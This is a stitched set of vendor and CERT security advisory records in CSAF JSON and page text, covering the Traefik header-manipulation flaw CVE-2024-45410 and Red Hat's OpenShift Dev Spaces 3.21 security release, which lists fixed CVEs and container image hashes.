"name": "traefik2-2.11.10-1.1.x86_64",
"product_id": "traefik2-2.11.10-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik2-2.11.10-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik2-2.11.10-1.1.aarch64"
},
"product_reference": "traefik2-2.11.10-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik2-2.11.10-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik2-2.11.10-1.1.ppc64le"
},
"product_reference": "traefik2-2.11.10-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik2-2.11.10-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik2-2.11.10-1.1.s390x"
},
"product_reference": "traefik2-2.11.10-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik2-2.11.10-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik2-2.11.10-1.1.x86_64"
},
"product_reference": "traefik2-2.11.10-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45410"
}
],
"notes": [
{
"category": "general",
"text": "Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.aarch64",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.ppc64le",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.s390x",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45410",
"url": "https://www.suse.com/security/cve/CVE-2024-45410"
},
{
"category": "external",
"summary": "SUSE Bug 1230842 for CVE-2024-45410",
"url": "https://bugzilla.suse.com/1230842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.aarch64",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.ppc64le",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.s390x",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.aarch64",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.ppc64le",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.s390x",
"openSUSE Tumbleweed:traefik2-2.11.10-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-09-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2024-45410"
}
]
}
CERTFR-2024-AVI-0812
Vulnerability from certfr_avis - Published: - Updated:
Une vulnérabilité a été découverte dans Traefik. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Traefik versions ant\u00e9rieures \u00e0 2.11.9",
"product": {
"name": "Traefik",
"vendor": {
"name": "Traefik",
"scada": false
}
}
},
{
"description": "Traefik versions 3.x ant\u00e9rieures \u00e0 3.1.3",
"product": {
"name": "Traefik",
"vendor": {
"name": "Traefik",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-45410",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45410"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-0812",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-09-25T00:00:00.000000"
}
],
"risks": [
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Traefik. Elle permet \u00e0 un attaquant de provoquer un contournement de la politique de s\u00e9curit\u00e9.",
"title": "Vuln\u00e9rabilit\u00e9 dans Traefik",
"vendor_advisories": [
{
"published_at": "2024-09-19",
"title": "Bulletin de s\u00e9curit\u00e9 Traefik GHSA-62c8-mh53-4cqv",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv"
}
]
}
CERTFR-2024-AVI-0812
Vulnerability from certfr_avis - Published: - Updated:
Une vulnérabilité a été découverte dans Traefik. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Traefik versions ant\u00e9rieures \u00e0 2.11.9",
"product": {
"name": "Traefik",
"vendor": {
"name": "Traefik",
"scada": false
}
}
},
{
"description": "Traefik versions 3.x ant\u00e9rieures \u00e0 3.1.3",
"product": {
"name": "Traefik",
"vendor": {
"name": "Traefik",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-45410",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45410"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-0812",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-09-25T00:00:00.000000"
}
],
"risks": [
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Traefik. Elle permet \u00e0 un attaquant de provoquer un contournement de la politique de s\u00e9curit\u00e9.",
"title": "Vuln\u00e9rabilit\u00e9 dans Traefik",
"vendor_advisories": [
{
"published_at": "2024-09-19",
"title": "Bulletin de s\u00e9curit\u00e9 Traefik GHSA-62c8-mh53-4cqv",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv"
}
]
}
RHSA-2025:8244
Vulnerability from csaf_redhat - Published: 2025-05-28 02:39 - Updated: 2025-12-05 12:23Summary
Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.21.0 release
Notes
Topic
Red Hat OpenShift Dev Spaces 3.21 has been released.
All containers have been updated to include feature enhancements, bug fixes and CVE fixes.
Details
Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.
The 3.21 release is based on Eclipse Che 7.102 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.
Users still using the v1 standard should migrate as soon as possible.
https://devfile.io/docs/2.2.0/migrating-to-devfile-v2
Dev Spaces releases support the latest two OpenShift 4 EUS releases. Users are expected to update to newer OpenShift releases in order to continue to get Dev Spaces updates.
https://access.redhat.com/support/policy/updates/openshift#devspaces
Security Fix(es):
devspaces-code
- tar-fs: link following and path traversal via maliciously crafted tar file (CVE-2024-12905)
devspaces-traefik
- traefik: HTTP client can manipulate custom HTTP headers that are added by Traefik (CVE-2024-45410)
- golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto (CVE-2024-45337)
- golang.org/x/crypto/ssh: Denial of Service in the Key Exchange of golang.org/x/crypto/ssh (CVE-2025-22869)
- golang-jwt/jwt: jwt-go allows excessive memory allocation during header parsing (CVE-2025-30204)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Dev Spaces 3.21 has been released.\n\nAll containers have been updated to include feature enhancements, bug fixes and CVE fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.\n\nThe 3.21 release is based on Eclipse Che 7.102 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.\n\nUsers still using the v1 standard should migrate as soon as possible.\n\nhttps://devfile.io/docs/2.2.0/migrating-to-devfile-v2\n\nDev Spaces releases support the latest two OpenShift 4 EUS releases. Users are expected to update to newer OpenShift releases in order to continue to get Dev Spaces updates. \n\nhttps://access.redhat.com/support/policy/updates/openshift#devspaces\n\nSecurity Fix(es):\n\ndevspaces-code\n- tar-fs: link following and path traversal via maliciously crafted tar file (CVE-2024-12905)\n\ndevspaces-traefik\n- traefik: HTTP client can manipulate custom HTTP headers that are added by Traefik (CVE-2024-45410)\n- golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto (CVE-2024-45337)\n- golang.org/x/crypto/ssh: Denial of Service in the Key Exchange of golang.org/x/crypto/ssh (CVE-2025-22869)\n- golang-jwt/jwt: jwt-go allows excessive memory allocation during header parsing (CVE-2025-30204)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:8244",
"url": "https://access.redhat.com/errata/RHSA-2025:8244"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2313584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313584"
},
{
"category": "external",
"summary": "2331720",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331720"
},
{
"category": "external",
"summary": "2348367",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2348367"
},
{
"category": "external",
"summary": "2354195",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2354195"
},
{
"category": "external",
"summary": "2355460",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2355460"
},
{
"category": "external",
"summary": "CRW-8607",
"url": "https://issues.redhat.com/browse/CRW-8607"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_8244.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.21.0 release",
"tracking": {
"current_release_date": "2025-12-05T12:23:37+00:00",
"generator": {
"date": "2025-12-05T12:23:37+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:8244",
"initial_release_date": "2025-05-28T02:39:39+00:00",
"revision_history": [
{
"date": "2025-05-28T02:39:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-05-28T02:39:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-05T12:23:37+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Dev Spaces 3",
"product": {
"name": "Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_devspaces:3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Dev Spaces"
},
{
"branches": [
{
"category": "product_version",
"name": "devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"product": {
"name": "devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"product_id": "devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=3.21-5"
}
}
},
{
"category": "product_version",
"name": "devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"product": {
"name": "devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"product_id": "devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"product": {
"name": "devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"product_id": "devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=3.21-12"
}
}
},
{
"category": "product_version",
"name": "devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"product": {
"name": "devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"product_id": "devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"product": {
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"product_id": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f?arch=s390x\u0026repository_url=registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"product": {
"name": "devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"product_id": "devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/machineexec-rhel9\u0026tag=3.21-4"
}
}
},
{
"category": "product_version",
"name": "devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"product": {
"name": "devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"product_id": "devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/devspaces-operator-bundle\u0026tag=3.21-25"
}
}
},
{
"category": "product_version",
"name": "devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"product": {
"name": "devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"product_id": "devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=3.21-7"
}
}
},
{
"category": "product_version",
"name": "devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"product": {
"name": "devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"product_id": "devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=3.21-6"
}
}
},
{
"category": "product_version",
"name": "devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"product": {
"name": "devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"product_id": "devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=3.21-11"
}
}
},
{
"category": "product_version",
"name": "devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"product": {
"name": "devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"product_id": "devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=3.21-1"
}
}
},
{
"category": "product_version",
"name": "devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"product": {
"name": "devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"product_id": "devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"product": {
"name": "devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"product_id": "devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=3.21-6"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"product": {
"name": "devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"product_id": "devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=3.21-5"
}
}
},
{
"category": "product_version",
"name": "devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"product": {
"name": "devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"product_id": "devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"product": {
"name": "devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"product_id": "devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=3.21-12"
}
}
},
{
"category": "product_version",
"name": "devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"product": {
"name": "devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"product_id": "devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"product": {
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"product_id": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"product": {
"name": "devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"product_id": "devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/machineexec-rhel9\u0026tag=3.21-4"
}
}
},
{
"category": "product_version",
"name": "devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"product": {
"name": "devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"product_id": "devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/devspaces-operator-bundle\u0026tag=3.21-25"
}
}
},
{
"category": "product_version",
"name": "devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"product": {
"name": "devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"product_id": "devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=3.21-7"
}
}
},
{
"category": "product_version",
"name": "devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"product": {
